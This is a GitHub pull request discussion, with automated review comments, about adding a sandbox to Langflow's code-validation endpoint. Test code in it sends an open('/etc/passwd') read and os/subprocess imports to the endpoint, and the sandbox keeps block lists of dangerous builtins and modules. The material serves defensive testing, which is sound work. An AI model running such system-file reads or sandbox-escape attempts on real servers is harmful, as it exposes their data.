Conversation

@jordanrfrazier (Collaborator) commented Nov 24, 2025

Summary by CodeRabbit

  • New Features

    • Added IBM watsonx.ai support as an embedding model provider
    • New embedding configuration options for token truncation and output text inclusion
  • Security

    • Code validation now runs in a sandboxed environment by default, preventing access to server resources and dangerous operations

✏️ Tip: You can customize this high-level summary in your review settings.

@coderabbitai coderabbitai bot (Contributor) commented Nov 24, 2025

Walkthrough

This PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation.
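For orientation, a minimal sketch of the intended call pattern, using the function names and default-deny behavior described in this review (the error handling shown is illustrative, not the actual validate.py code):

from lfx.custom.sandbox import SecurityViolation, execute_in_sandbox

user_code = """
import subprocess  # in BLOCKED_MODULES, so the isolated __import__ should refuse it

def run():
    return "never reached"
"""

code_obj = compile(user_code, "<user code>", "exec")
exec_globals = {}

try:
    execute_in_sandbox(code_obj, exec_globals)
except SecurityViolation as err:
    # The validate endpoint would report this as a validation error
    # instead of letting the dangerous operation run on the server.
    print(f"Blocked by sandbox: {err}")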

Changes

Cohort / File(s) Summary
Sandbox Infrastructure
src/lfx/src/lfx/custom/sandbox.py, src/lfx/src/lfx/custom/validate.py, src/lfx/src/lfx/services/settings/base.py
Introduces SecurityViolation exception, blocked builtins/modules lists, and core sandbox functions: create_isolated_builtins(), create_isolated_import(), execute_in_sandbox(). Integrates sandboxed import and function execution into validation flow. Adds allow_dangerous_code_validation configuration setting (default: False).
Sandbox Testing
src/lfx/tests/unit/custom/test_sandbox_isolation.py, src/lfx/tests/unit/custom/test_sandbox_security.py
Comprehensive isolation tests (parent globals/locals, builtins mutation, namespace freshness, decorator isolation) and security tests (server secrets/credentials inaccessibility, exfiltration prevention via commands/network, module state isolation).
Code Validation Tests
src/backend/tests/unit/api/v1/test_validate.py, src/backend/tests/unit/utils/test_validate.py
Adds security-focused validation endpoint tests verifying dangerous import/builtin blocking, safe code execution, and allowed module families. Updates utility test function to replace path resolution with JSON-encoded data processing.
IBM watsonx.ai Integration
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
Adds IBM watsonx.ai provider support to EmbeddingModelComponent: fetch_ibm_models() utility, new inputs (truncate_input_tokens, input_text), provider-specific update_build_config() logic for model discovery and field visibility management.

Sequence Diagram(s)

sequenceDiagram
    participant User as User Code
    participant Val as validate.py
    participant Sand as sandbox.py
    participant Builtins as Isolated Builtins
    participant Imports as Isolated Imports
    
    User->>Val: compile code snippet
    Val->>Val: create exec_globals
    Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
    
    Sand->>Builtins: create_isolated_builtins()
    Sand->>Imports: create_isolated_import()
    
    note over Sand: Prepare isolated environment
    Sand->>Sand: merge safe exec_globals
    Sand->>Sand: set __builtins__ to isolated
    Sand->>Sand: set __name__ and other attrs
    
    rect rgba(255, 200, 0, 0.2)
        note over Sand: Execute compiled code with isolation
        Sand->>User: exec(code_obj, isolated_globals)
    end
    
    alt Code attempts dangerous operation
        Builtins-->>Sand: raise SecurityViolation
        Sand-->>Val: SecurityViolation caught
        Val-->>User: validation fails
    else Code is safe
        User->>Imports: import langflow
        Imports-->>User: allowed (in safe list)
        Sand-->>Val: execution completes
        Val-->>User: validation succeeds
    end
sequenceDiagram
    participant Client as Client Request
    participant API as /api/v1/validate/code
    participant Handler as Validation Handler
    participant Sandbox as Sandbox Executor
    participant Config as Settings
    
    Client->>API: POST user_code
    API->>Config: check allow_dangerous_code_validation
    
    rect rgba(100, 200, 100, 0.2)
        note over Config: Default: False (block dangerous)
    end
    
    API->>Handler: validate(code, dangerous_allowed=False)
    
    Handler->>Handler: parse AST
    Handler->>Sandbox: execute imports in sandbox
    Handler->>Sandbox: execute functions in sandbox
    
    alt Dangerous operation detected
        rect rgba(255, 100, 100, 0.2)
            Sandbox-->>Handler: SecurityViolation
            Handler-->>API: 422 validation error
        end
    else Safe code
        rect rgba(100, 200, 100, 0.2)
            Sandbox-->>Handler: execution succeeds
            Handler-->>API: 200 validation passed
        end
    end
    
    API-->>Client: response

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~50 minutes

Areas requiring extra attention:

  • Security sandbox implementation (src/lfx/src/lfx/custom/sandbox.py) — Verify correctness of builtins isolation, import blocking mechanism, and builtins proxy to prevent sandbox escape; examine exception handling and fallback behavior.
  • Integration into validation flow (src/lfx/src/lfx/custom/validate.py) — Ensure sandboxed execution is correctly wired for both imports and function definitions; verify exec_globals context creation and error propagation.
  • Configuration setting propagation (src/lfx/src/lfx/services/settings/base.py) — Confirm that allow_dangerous_code_validation is properly threaded through to sandbox initialization and respects default-safe semantics.
  • Comprehensive test coverage (src/lfx/tests/unit/custom/test_sandbox_*.py) — Review assertion quality across isolation tests; verify security tests adequately cover exfiltration vectors and module state semantics.

Possibly related PRs

Suggested labels

enhancement, security, size:XXL

Suggested reviewers

  • ogabrielluiz
  • edwinjosechittilappilly

Pre-merge checks and finishing touches

Important

Pre-merge checks failed

Please resolve all errors before merging. Addressing warnings is optional.

❌ Failed checks (1 error, 2 warnings)
  • Test Coverage For New Implementations ❌ Error
    Explanation: Tests contain critical structural issues: execute_in_sandbox doesn't populate exec_globals, hard-coded API keys trigger scanners, and 'requests' is in BLOCKED_MODULES.
    Resolution: Refactor tests to move function calls into sandboxed code strings, replace hard-coded keys with non-realistic values, remove 'requests' from BLOCKED_MODULES or use different library, and fix Ruff violations.
  • Test Quality And Coverage ⚠️ Warning
    Explanation: Pull request contains significant test quality and coverage issues preventing proper validation of sandbox implementation.
    Resolution: Fix broken test logic in test_sandbox_isolation.py and test_sandbox_security.py, resolve contradictory module blocking policy in test_validate.py, fix Ruff violations, add build_class to builtins, and apply asyncio.to_thread() for synchronous fetch_ibm_models() calls.
  • Test File Naming And Structure ⚠️ Warning
    Explanation: Tests have critical structural flaws: exec_globals access will fail with KeyError, unused variables present, and fake API keys match real patterns triggering security scanners.
    Resolution: Move function calls into code strings for proper NameError raising, remove unused variables, replace 'sk-' prefixed keys with non-matching alternatives, and verify blocked modules in test expectations.
✅ Passed checks (4 passed)
  • Description Check ✅ Passed: Check skipped - CodeRabbit’s high-level summary is enabled.
  • Title check ✅ Passed: The title accurately reflects the primary change: adding sandbox isolation to the exec call in the validate endpoint, which is the core security enhancement across multiple files.
  • Docstring Coverage ✅ Passed: Docstring coverage is 86.49% which is sufficient. The required threshold is 80.00%.
  • Excessive Mock Usage Warning ✅ Passed: Test files demonstrate excellent test design with minimal and appropriate mock usage, focusing on real behavior verification.

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.


Comment @coderabbitai help to get the list of available commands and usage tips.

codecov bot commented Nov 24, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 31.23%. Comparing base (6f6c9a7) to head (b574590).

Additional details and impacted files

Impacted file tree graph

@@            Coverage Diff             @@
##             main   #10696      +/-   ##
==========================================
- Coverage   31.66%   31.23%   -0.44%     
==========================================
  Files        1350     1350              
  Lines       61163    61161       -2     
  Branches     9142     9142              
==========================================
- Hits        19368    19102     -266     
- Misses      40879    41143     +264     
  Partials      916      916              
Flag Coverage Δ
backend 50.19% <ø> (-1.73%) ⬇️

Flags with carried forward coverage won't be shown.

Files with missing lines Coverage Δ
src/lfx/src/lfx/custom/validate.py 40.55% <ø> (+0.28%) ⬆️
src/lfx/src/lfx/services/settings/base.py 69.78% <ø> (ø)

... and 43 files with indirect coverage changes


@coderabbitai coderabbitai bot left a comment

Actionable comments posted: 9

🧹 Nitpick comments (2)
src/lfx/src/lfx/custom/validate.py (1)

74-85: Function definition now executed in sandbox — verify expectations for decorator/default‑arg errors

Executing each FunctionDef via execute_in_sandbox with _create_langflow_execution_context() is a good way to catch definition-time errors (decorators, default args, annotations) without exposing server state. Just be aware that this will also surface SecurityViolation (e.g., if decorators/imports inside the function hit blocked modules) through the generic except Exception path and report it in function["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.
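For context, a rough sketch of the mapping being described (the sandbox import path is the one added in this PR; the surrounding error handling is assumed, not quoted from validate.py):

from lfx.custom.sandbox import execute_in_sandbox

function = {"errors": []}
func_code = 'def build(x=open("/etc/passwd").read()):\n    return x\n'
code_obj = compile(func_code, "<user code>", "exec")
exec_globals = {}  # validate.py passes _create_langflow_execution_context() here

try:
    # Decorators, default args, and annotations run at definition time, so a
    # blocked builtin like open() raises SecurityViolation inside this call.
    execute_in_sandbox(code_obj, exec_globals)
except Exception as exc:  # SecurityViolation is caught like any other error
    function["errors"].append(str(exc))  # what the validate API / UI will see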

src/backend/tests/unit/api/v1/test_validate.py (1)

183-209: Clean up W293 blank lines in docstrings for third‑party‑libs test.

Ruff reports W293 Blank line contains whitespace at line 184. That’s the empty line inside this docstring:

    """Test that third-party libraries (not in a whitelist) can be imported.
    
    Users should be able to import legitimate third-party libraries like AI libraries,
    ...
    """

You can fix it by removing the blank line or making it non‑blank:

-    """Test that third-party libraries (not in a whitelist) can be imported.
-    
-    Users should be able to import legitimate third-party libraries like AI libraries,
+    """Test that third-party libraries (not in a whitelist) can be imported.
+    Users should be able to import legitimate third-party libraries like AI libraries,

Same pattern applies to the docstrings around Lines 252 and 280; see next comment.

📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and 0328ae8.

⛔ Files ignored due to path filters (1)
  • uv.lock is excluded by !**/*.lock
📒 Files selected for processing (7)
  • src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
  • src/backend/tests/unit/utils/test_validate.py (1 hunks)
  • src/lfx/src/lfx/custom/sandbox.py (1 hunks)
  • src/lfx/src/lfx/custom/validate.py (2 hunks)
  • src/lfx/src/lfx/services/settings/base.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (5)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
  • create_isolated_import (140-173)
  • execute_in_sandbox (176-239)
  • isolated_import (149-171)
src/lfx/src/lfx/custom/sandbox.py (1)
src/backend/base/langflow/interface/importing/utils.py (1)
  • import_module (7-32)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (176-239)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (176-239)
src/backend/tests/unit/api/v1/test_validate.py (1)
src/backend/tests/conftest.py (1)
  • logged_in_headers (507-513)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py

[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.

🪛 GitHub Check: Ruff Style Check (3.13)
src/lfx/src/lfx/custom/sandbox.py

[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead

src/backend/tests/unit/api/v1/test_validate.py

[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace


[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)


[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace


[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace


[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used


[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)


[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)

🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)
  • GitHub Check: Lint Backend / Run Mypy (3.13)
  • GitHub Check: Lint Backend / Run Mypy (3.10)
  • GitHub Check: Lint Backend / Run Mypy (3.11)
  • GitHub Check: Lint Backend / Run Mypy (3.12)
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
  • GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
  • GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
  • GitHub Check: Test Starter Templates
  • GitHub Check: Update Component Index
🔇 Additional comments (2)
src/backend/tests/unit/utils/test_validate.py (1)

70-76: Typed function example looks consistent with sandboxed validation

Using from typing import List, Optional plus json/math inside process_data aligns with _create_langflow_execution_context (which seeds List/Optional into exec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.
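For reference, a function of roughly this shape (hypothetical; the actual test body is not shown in this diff) exercises those names:

import json
import math
from typing import List, Optional


def process_data(values: List[float], label: Optional[str] = None) -> str:
    total = math.fsum(values)
    return json.dumps({"label": label, "total": total})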

src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag aligns with sandbox env var; verify it’s actually wired through

Adding allow_dangerous_code_validation: bool = False with the LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION env mapping is consistent with the sandbox’s documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to drive ALLOW_DANGEROUS_CODE. Please confirm that:

  • Setting this field (or the env var) actually affects the sandbox behavior used by /api/v1/validate/code, and
  • There’s no divergence between the value in Settings and the value the sandbox module uses at import time.
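One possible way to avoid that import-time divergence (sketch only; the helper name and wiring are hypothetical):

import os


def dangerous_code_allowed(settings=None) -> bool:
    """Resolve the toggle at call time so Settings and the env var cannot drift."""
    if settings is not None:
        return bool(settings.allow_dangerous_code_validation)
    # Fallback mirrors the module-level check currently in sandbox.py
    return os.getenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "false").lower() == "true"

The sandbox checks could then call this helper instead of reading a module-level ALLOW_DANGEROUS_CODE constant once at import.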

Comment on lines 96 to 137

    assert response.status_code == status.HTTP_200_OK
    # Should have errors - dangerous imports are blocked
    assert len(result["imports"]["errors"]) > 0 or len(result["function"]["errors"]) > 0
    # Should mention that module is blocked
    all_errors = result["imports"]["errors"] + result["function"]["errors"]
    assert any("blocked" in str(err).lower() or "os" in str(err).lower() or "subprocess" in str(err).lower() for err in all_errors)


@pytest.mark.usefixtures("active_user")
async def test_validate_code_blocks_dangerous_builtins_by_default(client: AsyncClient, logged_in_headers):
    """Test that dangerous builtins are blocked by default."""
    # Code using dangerous builtins in default args should be blocked
    # (function-definition-time execution catches this)
    dangerous_code = """
def test(x=open('/etc/passwd', 'r').read()):
    return x
"""
    response = await client.post("api/v1/validate/code", json={"code": dangerous_code}, headers=logged_in_headers)
    result = response.json()
    assert response.status_code == status.HTTP_200_OK
    # Should have errors - dangerous builtins are blocked
    assert len(result["function"]["errors"]) > 0
    # Should mention that builtin is blocked
    assert any("blocked" in str(err).lower() or "open" in str(err).lower() for err in result["function"]["errors"])


@pytest.mark.usefixtures("active_user")
async def test_validate_code_cannot_access_server_globals(client: AsyncClient, logged_in_headers):
    """Test that code cannot access server's global namespace."""
    # Try to access something that would be in server globals
    code_trying_to_escape = """
def test():
    # Try to access parent frame or server globals
    import sys
    # This should execute but in isolation - can't access server's sys module state
    return sys.version
"""
    response = await client.post("api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers)
    result = response.json()
    assert response.status_code == status.HTTP_200_OK
    # Code executes but in isolation - sys is imported fresh, not server's sys


⚠️ Potential issue | 🟠 Major

Fix Ruff E501 / F841 in dangerous‑imports and server‑globals tests.

Ruff is (correctly) flagging:

  • Line 101: E501 line too long.
  • Line 133: E501 line too long.
  • Line 134: F841 result is assigned but never used.

You can resolve all three without changing test semantics:

@@ async def test_validate_code_blocks_dangerous_imports_by_default(client: AsyncClient, logged_in_headers):
-    all_errors = result["imports"]["errors"] + result["function"]["errors"]
-    assert any("blocked" in str(err).lower() or "os" in str(err).lower() or "subprocess" in str(err).lower() for err in all_errors)
+    all_errors = result["imports"]["errors"] + result["function"]["errors"]
+    assert any(
+        "blocked" in str(err).lower()
+        or "os" in str(err).lower()
+        or "subprocess" in str(err).lower()
+        for err in all_errors
+    )
@@ async def test_validate_code_cannot_access_server_globals(client: AsyncClient, logged_in_headers):
-    response = await client.post("api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers)
-    result = response.json()
+    response = await client.post(
+        "api/v1/validate/code",
+        json={"code": code_trying_to_escape},
+        headers=logged_in_headers,
+    )
@@
-    assert response.status_code == status.HTTP_200_OK
-    # Code executes but in isolation - sys is imported fresh, not server's sys
+    assert response.status_code == status.HTTP_200_OK
+    # Code executes but in isolation - sys is imported fresh, not server's sys

This keeps the intent while satisfying Ruff line‑length and unused‑variable rules. As per pipeline failures.

🧰 Tools
🪛 GitHub Actions: Ruff Style Check

[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used


[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)


[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)

Comment on lines 181 to 209

@pytest.mark.usefixtures("active_user")
async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers):
    """Test that third-party libraries (not in a whitelist) can be imported.

    Users should be able to import legitimate third-party libraries like AI libraries,
    data processing libraries, etc. We only block dangerous system-level modules.
    """
    # Try importing a common third-party library that wouldn't be in a whitelist
    # Using 'requests' as an example - it's a legitimate library but not dangerous
    # Note: This test will fail if 'requests' isn't installed, but that's okay
    # The important thing is that if it IS installed, it should be allowed
    third_party_code = """
try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False

def test():
    return HAS_REQUESTS
"""
    response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers)
    result = response.json()
    assert response.status_code == status.HTTP_200_OK
    # Should execute without errors - third-party libraries are allowed
    # (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.)
    assert len(result["imports"]["errors"]) == 0
    assert len(result["function"]["errors"]) == 0


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Third‑party library test conflicts with sandbox BLOCKED_MODULES (requests is currently blocked).

test_validate_code_allows_third_party_libraries assumes that importing requests is allowed and that validation returns no errors:

# Using 'requests' as an example - it's a legitimate library but not dangerous
...
assert len(result["imports"]["errors"]) == 0
assert len(result["function"]["errors"]) == 0

However, the sandbox’s BLOCKED_MODULES set explicitly includes "requests" (and "httpx"), treating network access as dangerous. With the current sandbox, this test will fail because the import will raise a SecurityViolation, not an ImportError, and you’ll see validation errors.

You should align test expectations with the sandbox policy in one of these ways:

  • Option A (keep requests blocked): change the test to use some other third‑party library that is not in BLOCKED_MODULES (e.g., a common dependency in your stack), and update the comments to clarify that HTTP clients are intentionally blocked.
  • Option B (allow requests in validation): remove "requests" (and possibly "httpx") from BLOCKED_MODULES if you’re comfortable allowing outbound HTTP in validation, and adjust the sandbox tests accordingly.

Given the top‑level docstring in sandbox.py says that network operations are blocked by default, Option A seems more consistent with the current security model.


🏁 Script executed:

#!/bin/bash
# Double‑check the current BLOCKED_MODULES definition and where this test runs.
rg -n "BLOCKED_MODULES" -S src/lfx/src/lfx/custom/sandbox.py
rg -n "test_validate_code_allows_third_party_libraries" -S

Length of output: 424


I need to inspect the actual contents of the BLOCKED_MODULES set to verify the review comment's claim. Let me gather that information:



🏁 Script executed:

#!/bin/bash
# View the BLOCKED_MODULES set definition (lines around 42)
sed -n '42,80p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 700


Now I need to verify what happens during validation when a blocked module is encountered, and confirm the test would fail as claimed:



🏁 Script executed:

#!/bin/bash
# Check the validation logic around line 156 that checks BLOCKED_MODULES
sed -n '150,175p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1285


I need to see how the validate endpoint handles SecurityViolation exceptions and what error structure gets returned:



🏁 Script executed:

#!/bin/bash
# Find the validate endpoint code for the /api/v1/validate/code route
rg -n "validate/code" -A 20 -B 5 src/backend/app/api/v1/

Length of output: 63


Let me search more broadly for the validate endpoint implementation:



🏁 Script executed:

#!/bin/bash
# Find the validate endpoint code by searching for the route handler
rg -n "def.*validate.*code" -A 15 src/backend/

Length of output: 297840


Blocked module ("requests") in sandbox makes this test fail — update test or sandbox policy.

BLOCKED_MODULES in src/lfx/src/lfx/custom/sandbox.py explicitly contains "requests" and "httpx" (around line 42) and the import hook raises SecurityViolation for blocked modules (check around line 156). The test src/backend/tests/unit/api/v1/test_validate.py::test_validate_code_allows_third_party_libraries (lines 181–209) expects no import/function errors but will fail under the current sandbox policy.

  • Option A (recommended): change the test to import a safe, non‑blocked third‑party library (e.g., numpy, pydantic, pandas) and update the test comments to state HTTP clients are intentionally blocked.
  • Option B: if you want validation to allow HTTP clients, remove "requests" and "httpx" from BLOCKED_MODULES and update sandbox docs/tests to reflect the policy change.
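A possible shape for Option A (illustrative; assumes pydantic is installed in the test environment and is not in BLOCKED_MODULES):

third_party_code = """
try:
    import pydantic  # HTTP clients like requests/httpx stay intentionally blocked
    HAS_LIB = True
except ImportError:
    HAS_LIB = False

def test():
    return HAS_LIB
"""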
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace

Comment on lines 249 to 291

@pytest.mark.usefixtures("active_user")
async def test_validate_code_cannot_access_real_builtins(client: AsyncClient, logged_in_headers):
    """Test that code cannot escape via real __builtins__.

    If isolation were broken, code could access the real __builtins__ to escape.
    We test this by trying to access __builtins__ directly (which should be isolated).
    """
    # Try to access __builtins__ directly - if isolation is broken, this would work
    code_trying_builtins_escape = """
def test():
    # Try to access __builtins__ directly from globals
    # If isolation is broken, this would give us the real builtins
    try:
        real_builtins = globals().get('__builtins__')
        # If we got real builtins, we could escape - but we should get isolated version
        return type(real_builtins).__name__
    except Exception:
        return 'isolated'
"""
    response = await client.post("api/v1/validate/code", json={"code": code_trying_builtins_escape}, headers=logged_in_headers)
    result = response.json()
    assert response.status_code == status.HTTP_200_OK
    # Code should execute successfully - the key is that __builtins__ is isolated
    # We can't easily verify it's isolated via API, but execution without errors
    # combined with other isolation tests proves it works
    assert len(result["function"]["errors"]) == 0  # Should execute without errors


@pytest.mark.usefixtures("active_user")
async def test_validate_code_uses_isolated_sandbox(client: AsyncClient, logged_in_headers):
    """Test that validate endpoint uses isolated sandbox.

    This test verifies that code executes in sandbox (doesn't crash).
    Actual isolation behavior is tested in sandbox unit tests.
    """
    # Code that sets variables - should execute without errors
    # (Isolation is verified in sandbox unit tests)
    code_with_variables = """
MY_VAR = "test"
def test():
    return MY_VAR
"""
    response = await client.post("api/v1/validate/code", json={"code": code_with_variables}, headers=logged_in_headers)

⚠️ Potential issue | 🟠 Major

Fix remaining Ruff W293 / E501 issues in builtins and sandbox‑usage tests.

Ruff flags:

  • W293 at lines 252 and 280: blank lines with whitespace in docstrings.
  • E501 at line 268: client.post(...) line too long.

You can resolve them with small formatting changes:

@@ async def test_validate_code_cannot_access_real_builtins(client: AsyncClient, logged_in_headers):
-    """Test that code cannot escape via real __builtins__.
-    
-    If isolation were broken, code could access the real __builtins__ to escape.
+    """Test that code cannot escape via real __builtins__.
+    If isolation were broken, code could access the real __builtins__ to escape.
@@
-    response = await client.post("api/v1/validate/code", json={"code": code_trying_builtins_escape}, headers=logged_in_headers)
+    response = await client.post(
+        "api/v1/validate/code",
+        json={"code": code_trying_builtins_escape},
+        headers=logged_in_headers,
+    )
@@ async def test_validate_code_uses_isolated_sandbox(client: AsyncClient, logged_in_headers):
-    """Test that validate endpoint uses isolated sandbox.
-    
-    This test verifies that code executes in sandbox (doesn't crash).
+    """Test that validate endpoint uses isolated sandbox.
+    This test verifies that code executes in sandbox (doesn't crash).

This should clear the remaining Ruff warnings without changing test behavior.

🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace


[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)


[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace

🤖 Prompt for AI Agents
In src/backend/tests/unit/api/v1/test_validate.py around lines 249 to 291, fix
Ruff W293 by removing trailing whitespace/extra blank-line characters inside the
two docstrings (near lines 252 and 280) and fix E501 on the long
client.post(...) call (around line 268) by wrapping the call across multiple
lines or assigning the URL/json to a short variable and passing it, keeping the
same arguments and behavior; make only whitespace/line-break edits so tests
remain functionally unchanged.

Comment on lines 10 to 27

import builtins
import importlib
import os
from typing import Any, Dict, Set


class SecurityViolation(Exception):
    """Raised when code attempts to escape the sandbox or use blocked operations."""

    pass


# Check if dangerous operations are allowed via environment variable
ALLOW_DANGEROUS_CODE = os.getenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "false").lower() == "true"

# Dangerous builtins that should be blocked by default
BLOCKED_BUILTINS: Set[str] = {
    "open",  # File I/O

⚠️ Potential issue | 🟡 Minor

🧩 Analysis chain

Align type hints with modern typing and Ruff, and consider exception naming.

Ruff is flagging Dict/Set (UP035) and the exception name (N818). You can address both with small, non‑behavioral changes:

  • Use built‑in generics instead of typing.Dict / typing.Set.
  • Optionally rename SecurityViolation to follow the *Error convention if you want Ruff clean.

Example diff:

-import builtins
-import importlib
-import os
-from typing import Any, Dict, Set
+import builtins
+import importlib
+import os
+from typing import Any
@@
-class SecurityViolation(Exception):
+class SecurityViolation(Exception):  # or `SecurityViolationError` if you want to satisfy N818
     """Raised when code attempts to escape the sandbox or use blocked operations."""
@@
-# Dangerous builtins that should be blocked by default
-BLOCKED_BUILTINS: Set[str] = {
+# Dangerous builtins that should be blocked by default
+BLOCKED_BUILTINS: set[str] = {
@@
-# Dangerous modules that should be blocked by default
-BLOCKED_MODULES: Set[str] = {
+# Dangerous modules that should be blocked by default
+BLOCKED_MODULES: set[str] = {

If you do decide to rename the exception to something like SecurityViolationError, remember to update all imports/usages across the codebase and tests so they still catch the right type. As per static analysis hints.


🏁 Script executed:

#!/bin/bash
# Confirm all references to the sandbox exception are updated consistently.
rg -n "SecurityViolation" -S

Length of output: 504



Wait, let me correct that - I need to search properly in the repo:




🏁 Script executed:

#!/bin/bash
# Search for all imports/references to SecurityViolation across entire codebase
rg -n "from.*sandbox.*import|import.*SecurityViolation" --type=py
rg -n "SecurityViolation" --type=py | grep -v "sandbox.py"

Length of output: 319


🏁 Script executed:

#!/bin/bash
# Check if SecurityViolation is in __all__ or explicitly exported
fd -e py -exec grep -l "__all__" {} \; | head -10

Length of output: 191


🏁 Script executed:

#!/bin/bash
# Search for imports of SecurityViolation from sandbox module
rg "from.*sandbox.*import.*SecurityViolation|import.*sandbox.*SecurityViolation" --type=py
# Also search for any __all__ declarations in sandbox.py
rg -A 5 "__all__" src/lfx/src/lfx/custom/sandbox.py

Length of output: 0


Type hints and exception naming are safe, localized refactoring.

Verification confirms SecurityViolation is not imported or referenced outside sandbox.py, so renaming to SecurityViolationError requires updates only within that single file (5 locations: lines 16, 128, 157, 194, 233). The Dict/Set → dict/set modernization is also straightforward and safe. Both changes align with Ruff's modern Python conventions.

🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead

Comment on lines 123 to 173

    class IsolatedBuiltinsModule:
        """Fake builtins module that prevents escaping."""
        def __getattr__(self, name: str) -> Any:
            # Block dangerous builtins unless explicitly allowed
            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
                raise SecurityViolation(f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow.")
            if name == "__builtins__":
                return isolated_builtins
            if hasattr(builtins, name):
                return getattr(builtins, name)
            raise AttributeError(f"module 'builtins' has no attribute '{name}'")

